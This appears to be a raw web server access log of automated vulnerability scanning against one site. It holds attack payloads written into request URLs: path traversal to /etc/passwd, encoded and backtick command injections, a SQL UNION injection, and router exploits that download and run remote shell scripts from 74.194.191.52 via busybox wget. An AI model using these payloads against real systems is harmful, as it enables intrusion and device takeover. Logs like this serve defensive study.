205.185.122.202 - - [19/Oct/2025:15:13:20 +0530] "GET /wp-content/plugins/nd-booking/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:15:13:21 +0530] "GET /wp-content/plugins/nd-booking/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:15:15:19 +0530] "GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:15:15:19 +0530] "GET /wp-content/plugins/download-manager/readme.txt HTTP/1.1" 404 1086
205.185.122.202 - - [19/Oct/2025:15:15:39 +0530] "POST /api/users HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:15:40 +0530] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:15:15:40 +0530] "POST /api/users HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:15:40 +0530] "POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:15:16:15 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:16:15 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:16:20 +0530] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:16:21 +0530] "POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:16:25 +0530] "GET /wp-content/plugins/checklist/readme.txt HTTP/1.1" 404 1072
205.185.122.202 - - [19/Oct/2025:15:16:25 +0530] "GET /wp-content/plugins/checklist/readme.txt HTTP/1.1" 404 1072
172.232.232.179 - - [19/Oct/2025:15:16:37 +0530] "GET / HTTP/1.0" 200 11230
172.232.232.179 - - [19/Oct/2025:15:16:58 +0530] "GET /webui HTTP/1.1" 404 1004
172.232.232.179 - - [19/Oct/2025:15:16:58 +0530] "GET / HTTP/1.1" 200 11250
172.232.232.179 - - [19/Oct/2025:15:17:02 +0530] "GET /favicon.ico HTTP/1.1" 200 21630
172.232.232.179 - - [19/Oct/2025:15:17:02 +0530] "GET / HTTP/1.1" 200 11250
176.65.149.21 - - [19/Oct/2025:15:17:04 +0530] "GET / HTTP/1.1" 200 11250
172.232.232.179 - - [19/Oct/2025:15:17:04 +0530] "GET /owa/ HTTP/1.1" 404 1002
172.232.232.179 - - [19/Oct/2025:15:17:07 +0530] "GET /owa/ HTTP/1.1" 404 1002
172.232.232.179 - - [19/Oct/2025:15:17:07 +0530] "GET / HTTP/1.1" 200 11250
172.232.232.179 - - [19/Oct/2025:15:17:10 +0530] "-" 400 -
172.232.232.179 - - [19/Oct/2025:15:17:26 +0530] "GET / HTTP/1.0" 200 11230
176.65.149.21 - - [19/Oct/2025:15:17:26 +0530] "GET / HTTP/1.1" 200 11250
172.232.232.179 - - [19/Oct/2025:15:17:27 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:17:34 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:17:34 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:17:36 +0530] "POST /wp-json/visualizer/v1/update-chart HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:15:17:36 +0530] "POST /wp-json/visualizer/v1/update-chart HTTP/1.1" 404 1062
205.185.122.202 - - [19/Oct/2025:15:17:38 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:17:38 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:17:40 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:17:41 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:17:41 +0530] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:17:41 +0530] "POST /admin/?n=language&c=language_general&a=doExportPack HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:17:56 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:17:56 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:17:57 +0530] "GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:15:17:58 +0530] "GET /wp-content/plugins/visualizer/readme.txt HTTP/1.1" 404 1074
205.185.122.202 - - [19/Oct/2025:15:17:59 +0530] "GET /?export_settings=1 HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:17:59 +0530] "GET /?export_settings=1 HTTP/1.1" 200 11250
195.96.129.4 - - [19/Oct/2025:15:18:17 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:18:30 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:18:31 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:18:49 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:18:49 +0530] "POST /wp-admin/admin.php?page=EWD-UFAQ-Options&DisplayPage=ImportPosts&Action=EWD_UFAQ_ImportFaqsFromSpreadsheet HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:18:49 +0530] "POST /wp-admin/admin.php?page=EWD-UFAQ-Options&DisplayPage=ImportPosts&Action=EWD_UFAQ_ImportFaqsFromSpreadsheet HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:18:49 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:18:52 +0530] "POST /wp-admin/admin.php?page=EWD-UFAQ-Options&DisplayPage=ImportPosts&Action=EWD_UFAQ_ImportFaqsFromSpreadsheet HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:18:52 +0530] "POST /wp-admin/admin.php?page=EWD-UFAQ-Options&DisplayPage=ImportPosts&Action=EWD_UFAQ_ImportFaqsFromSpreadsheet HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:19:00 +0530] "POST /ui/auth/login HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:19:00 +0530] "POST /artifactory/ui/auth/login HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:19:00 +0530] "POST /ui/auth/login HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:19:00 +0530] "POST /artifactory/ui/auth/login HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:19:10 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:19:10 +0530] "GET /zabbix.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:19:10 +0530] "GET /zabbix/zabbix.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:19:11 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:19:11 +0530] "POST /getcfg.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:19:11 +0530] "GET /zabbix/zabbix.php HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:19:12 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:19:12 +0530] "GET /zabbix.php HTTP/1.1" 404 1014
205.185.122.202 - - [19/Oct/2025:15:19:13 +0530] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:15:19:14 +0530] "GET /jnoj/web/polygon/problem/viewfile?id=1&name=../../../../../../../etc/passwd HTTP/1.1" 404 1060
205.185.122.202 - - [19/Oct/2025:15:19:19 +0530] "POST /com.example.TestService HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:19:19 +0530] "POST /com.example.TestService HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:19:21 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:19:21 +0530] "GET /solr/admin/cores?wt=json HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:19:36 +0530] "GET /34HFSfiT9CCrePULX0hhJ8gs8jw/../../ThinVnc.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:15:19:36 +0530] "GET /34HFSfiT9CCrePULX0hhJ8gs8jw/../../ThinVnc.ini HTTP/1.1" 400 -
205.185.122.202 - - [19/Oct/2025:15:19:37 +0530] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:19:37 +0530] "GET /?pum_action=tools_page_tab_system_info HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:19:38 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:19:38 +0530] "POST / HTTP/1.1" 200 11250
213.209.143.66 - - [19/Oct/2025:15:20:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:20:20 +0530] "POST /admin/auth/reset-password HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:20:20 +0530] "POST /admin/auth/reset-password HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:20:22 +0530] "POST /servlet/UploadServlet HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:20:23 +0530] "POST /servlet/UploadServlet HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:20:24 +0530] "GET /test.txt HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:15:20:25 +0530] "GET /test.txt HTTP/1.1" 404 1010
205.185.122.202 - - [19/Oct/2025:15:20:58 +0530] "POST /cgi-bin/up.cgi HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:20:59 +0530] "POST /cgi-bin/up.cgi HTTP/1.1" 404 1022
195.96.129.4 - - [19/Oct/2025:15:21:02 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:21:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:21:04 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:21:17 +0530] "POST /dashboard/uploadID.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:21:17 +0530] "POST /dashboard/uploadID.php HTTP/1.1" 404 1038
205.185.122.202 - - [19/Oct/2025:15:21:28 +0530] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:21:28 +0530] "POST /pandora_console/index.php?login=1 HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:21:48 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:21:48 +0530] "POST /wp-admin/admin-ajax.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:22:06 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:22:07 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:22:40 +0530] "GET /wp-content/plugins/woocommerce-abandoned-cart/readme.txt HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:15:22:41 +0530] "GET /wp-content/plugins/woocommerce-abandoned-cart/readme.txt HTTP/1.1" 404 1106
205.185.122.202 - - [19/Oct/2025:15:23:12 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:23:12 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:23:13 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:23:13 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/Slots HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:23:20 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:23:21 +0530] "GET /cs/Satellite?pagename=OpenMarket/Xcelerate/Admin/WebReferences HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:24:18 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:18 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:20 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:20 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:27 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:28 +0530] "POST /wls-wsat/CoordinatorPortType HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:29 +0530] "POST /_async/AsyncResponseService HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:24:31 +0530] "POST /_async/AsyncResponseService HTTP/1.1" 404 1048
205.185.122.202 - - [19/Oct/2025:15:24:32 +0530] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:32 +0530] "GET /_async/favicon.ico HTTP/1.1" 404 1030
205.185.122.202 - - [19/Oct/2025:15:24:32 +0530] "POST /rest/tinymce/1/macro/preview HTTP/1.1" 404 1050
205.185.122.202 - - [19/Oct/2025:15:24:33 +0530] "GET /_async/favicon.ico HTTP/1.1" 404 1030
87.120.191.84 - - [19/Oct/2025:15:24:45 +0530] "GET / HTTP/1.1" 200 11250
213.209.143.66 - - [19/Oct/2025:15:24:48 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:25:30 +0530] "GET /objects/getImage.php?base64Url=YGlkID4ga2ltZGkudHh0YA===&format=png HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:15:25:30 +0530] "GET /objects/getImage.php?base64Url=YGlkID4ga2ltZGkudHh0YA===&format=png HTTP/1.1" 404 1034
205.185.122.202 - - [19/Oct/2025:15:25:32 +0530] "GET /objects/getImageMP4.php?base64Url=YGlkID4ga2ltZGkudHh0YA===&format=jpg HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:25:32 +0530] "GET /objects/getImageMP4.php?base64Url=YGlkID4ga2ltZGkudHh0YA===&format=jpg HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:25:34 +0530] "GET /objects/getImageMP4.php?base64Url=YGlkID4gU0dYaS50eHRg&format=jpg HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:25:34 +0530] "GET /objects/getImageMP4.php?base64Url=YGlkID4gU0dYaS50eHRg&format=jpg HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:25:35 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4ga2ltZGkudHh0YA===&format=jpg HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:15:25:35 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4ga2ltZGkudHh0YA===&format=jpg HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:15:25:36 +0530] "GET /objects/SGXi.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:25:37 +0530] "GET /objects/SGXi.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:25:38 +0530] "GET /objects/kimdi.txt HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:25:38 +0530] "GET /objects/kimdi.txt HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:25:40 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gZ2tBTS50eHRg&format=jpg HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:15:25:41 +0530] "GET /objects/getSpiritsFromVideo.php?base64Url=YGlkID4gZ2tBTS50eHRg&format=jpg HTTP/1.1" 404 1056
205.185.122.202 - - [19/Oct/2025:15:25:43 +0530] "GET /objects/gkAM.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:25:43 +0530] "GET /objects/gkAM.txt HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:25:51 +0530] "POST /adxmlrpc.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:25:51 +0530] "POST /adxmlrpc.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:25:52 +0530] "POST /node/1?_format=hal_json HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:25:53 +0530] "POST /node/1?_format=hal_json HTTP/1.1" 404 1006
205.185.122.202 - - [19/Oct/2025:15:25:54 +0530] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:15:25:54 +0530] "GET /plugins/3rdPartyServers/ox3rdPartyServers/max.class.php?0=id HTTP/1.1" 404 1104
205.185.122.202 - - [19/Oct/2025:15:25:55 +0530] "GET /wp-content/plugins/total-donations/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:15:25:55 +0530] "GET /wp-content/plugins/total-donations/readme.txt HTTP/1.1" 404 1084
205.185.122.202 - - [19/Oct/2025:15:26:23 +0530] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:15:26:24 +0530] "PUT /wp-content/plugins/w3-total-cache/pub/sns.php HTTP/1.1" 403 1004
205.185.122.202 - - [19/Oct/2025:15:26:52 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:26:53 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:27:01 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:27:02 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:27:31 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:27:32 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:27:33 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:27:33 +0530] "POST /photo/p/api/album.php HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:27:35 +0530] "POST /service/extdirect HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:27:36 +0530] "POST /service/extdirect HTTP/1.1" 404 1028
205.185.122.202 - - [19/Oct/2025:15:27:55 +0530] "GET /tools/ajax/ConsoleResult.html?get HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:27:55 +0530] "GET /tools/ajax/ConsoleResult.html?get HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:27:57 +0530] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20tLmfxmrsDO.txt%60 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:27:57 +0530] "GET /card_scan.php?No=30&ReaderNo=%60cat%20/etc/passwd%20%3E%20tLmfxmrsDO.txt%60 HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:27:58 +0530] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:27:58 +0530] "POST /cgi-bin/supportInstaller HTTP/1.1" 404 1042
205.185.122.202 - - [19/Oct/2025:15:28:00 +0530] "GET /tLmfxmrsDO.txt HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:28:00 +0530] "GET /tLmfxmrsDO.txt HTTP/1.1" 404 1022
205.185.122.202 - - [19/Oct/2025:15:28:22 +0530] "POST /api/timelion/run HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:28:22 +0530] "POST /api/timelion/run HTTP/1.1" 404 1026
205.185.122.202 - - [19/Oct/2025:15:28:35 +0530] "GET /index.php/login HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:15:28:37 +0530] "POST /kindeditor/php/demo.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:28:37 +0530] "POST /content/34HFROuijnP2NA0X8QEqXBSn26j HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:15:28:37 +0530] "POST /content/34HFROuijnP2NA0X8QEqXBSn26j HTTP/1.1" 404 1064
205.185.122.202 - - [19/Oct/2025:15:28:37 +0530] "POST /kindeditor/php/demo.php HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:28:37 +0530] "GET /index.php/login HTTP/1.1" 404 1024
205.185.122.202 - - [19/Oct/2025:15:28:40 +0530] "POST /php/demo.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:28:40 +0530] "POST /content/34HFROuijnP2NA0X8QEqXBSn26j.af.internalsubmit.json HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:15:28:41 +0530] "POST /php/demo.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:28:41 +0530] "POST /content/34HFROuijnP2NA0X8QEqXBSn26j.af.internalsubmit.json HTTP/1.1" 404 1110
205.185.122.202 - - [19/Oct/2025:15:29:27 +0530] "POST /rest/issueNav/1/issueTable HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:15:29:27 +0530] "POST /rest/issueNav/1/issueTable HTTP/1.1" 404 1046
205.185.122.202 - - [19/Oct/2025:15:30:18 +0530] "GET /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:30:18 +0530] "GET /wp-login.php HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:30:27 +0530] "POST /search/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:30:27 +0530] "POST /search/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:30:29 +0530] "POST /autodiscover HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:30:29 +0530] "POST /search/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:30:30 +0530] "POST /search/ HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:30:30 +0530] "POST /CDGServer3/ClientAjax HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:30:30 +0530] "POST /CDGServer3/ClientAjax HTTP/1.1" 404 1036
205.185.122.202 - - [19/Oct/2025:15:30:30 +0530] "POST /autodiscover HTTP/1.1" 404 1018
205.185.122.202 - - [19/Oct/2025:15:30:33 +0530] "POST /php/connector.minimal.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:30:33 +0530] "POST /php/connector.minimal.php HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:30:40 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:30:40 +0530] "POST /Autodiscover/Autodiscover.xml HTTP/1.1" 404 1052
205.185.122.202 - - [19/Oct/2025:15:30:50 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:30:50 +0530] "POST /artifactory/ui/auth/login?_spring_security_remember_me=false HTTP/1.1" 404 1044
205.185.122.202 - - [19/Oct/2025:15:32:11 +0530] "GET /labkey/home/project-begin.view HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:15:32:12 +0530] "GET /labkey/home/project-begin.view HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:15:32:23 +0530] "GET /include/plugin/payment/alipay/pay.php?id=pay%20where%201=1%20union%20select%201,2,CONCAT(md5(999999999)),4,5,6,7,8,9,10,11,12%23_ HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:15:32:23 +0530] "GET /include/plugin/payment/alipay/pay.php?id=pay%20where%201=1%20union%20select%201,2,CONCAT(md5(999999999)),4,5,6,7,8,9,10,11,12%23_ HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:15:32:27 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:32:27 +0530] "POST / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:33:19 +0530] "POST /graphql HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:33:19 +0530] "POST /graphql HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:33:20 +0530] "POST /graphql HTTP/1.1" 404 1008
205.185.122.202 - - [19/Oct/2025:15:33:20 +0530] "POST /graphql HTTP/1.1" 404 1008
45.153.34.54 - - [19/Oct/2025:15:33:23 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:33:32 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:33:32 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:33:45 +0530] "GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:33:45 +0530] "GET /wp-content/plugins/social-warfare/readme.txt HTTP/1.1" 404 1082
205.185.122.202 - - [19/Oct/2025:15:34:46 +0530] "POST /service/rapture/session HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:34:47 +0530] "POST /service/rapture/session HTTP/1.1" 404 1040
205.185.122.202 - - [19/Oct/2025:15:34:49 +0530] "POST /api/snapshots HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:34:49 +0530] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:15:34:49 +0530] "POST /service/rest/beta/repositories/bower/group HTTP/1.1" 404 1078
205.185.122.202 - - [19/Oct/2025:15:34:50 +0530] "POST /api/snapshots HTTP/1.1" 404 1020
205.185.122.202 - - [19/Oct/2025:15:34:54 +0530] "GET /index.php?route=/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:34:55 +0530] "GET /index.php?route=/ HTTP/1.1" 404 1012
205.185.122.202 - - [19/Oct/2025:15:35:01 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:35:01 +0530] "GET / HTTP/1.1" 200 11250
205.185.122.202 - - [19/Oct/2025:15:35:04 +0530] "POST /wp-json/rankmath/v1/updateMeta HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:15:35:04 +0530] "POST /wp-json/rankmath/v1/updateMeta HTTP/1.1" 404 1054
205.185.122.202 - - [19/Oct/2025:15:35:07 +0530] "POST /wp-json/rankmath/v1/updateRedirection HTTP/1.1" 404 1068
205.185.122.202 - - [19/Oct/2025:15:35:07 +0530] "POST /wp-json/rankmath/v1/updateRedirection HTTP/1.1" 404 1068
124.198.131.83 - - [19/Oct/2025:15:35:25 +0530] "POST /tmUnblock.cgi HTTP/1.1" 404 1020
124.198.131.83 - - [19/Oct/2025:15:35:25 +0530] "POST /goform/set_LimitClient_cfg HTTP/1.1" 404 -
124.198.131.83 - - [19/Oct/2025:15:35:25 +0530] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%60busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.zqq.sh%7Csh%60 HTTP/1.1" 404 -
124.198.131.83 - - [19/Oct/2025:15:35:26 +0530] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=busybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.ush.sh%7Csh%26&curpath=%2F¤tsetting.htm=1 HTTP/1.1" 404 1012
124.198.131.83 - - [19/Oct/2025:15:35:26 +0530] "GET null null" 400 -
124.198.131.83 - - [19/Oct/2025:15:35:26 +0530] "POST /apply_sec.cgi HTTP/1.1" 404 1020
124.198.131.83 - - [19/Oct/2025:15:35:26 +0530] "POST /goform/mp HTTP/1.1" 404 -
124.198.131.83 - - [19/Oct/2025:15:35:27 +0530] "GET /goform/setUsbUnload/.js?deviceName=A%3Bbusybox%20wget%20-qO-%20http%3A%2F%2F74.194.191.52%2Frondo.uzz.sh%7Csh%26echo%20 HTTP/1.0" 404 1040
124.198.131.83 - - [19/Oct/2025:15:35:27 +0530] "POST /goform/setPingInfo HTTP/1.1" 404 1030
